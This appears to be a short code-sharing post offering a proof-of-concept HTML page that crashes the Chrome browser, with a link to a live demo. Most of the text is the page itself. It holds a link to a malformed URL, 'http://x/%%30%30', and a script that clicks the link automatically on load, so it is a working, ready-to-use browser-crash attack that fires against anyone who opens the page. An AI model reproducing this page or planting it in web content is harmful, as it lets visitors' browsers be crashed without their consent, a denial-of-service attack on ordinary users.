Proof of Concept code to crash Chrome instantly. Demo for the same code can be seen here: http://bl.ocks.org/akshatmittal/9398ba45208985a81bac
The link takes live code from index.html
Proof of Concept code to crash Chrome instantly. Demo for the same code can be seen here: http://bl.ocks.org/akshatmittal/9398ba45208985a81bac
The link takes live code from index.html
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta charset="utf-8"> | |
| <title>Chrome Crash</title> | |
| </head> | |
| <body> | |
| <a href="http://x/%%30%30" id="tep">Crash Chrome</a> | |
| <script>document.getElementById('tep').click();</script> | |
| </body> | |
| </html> |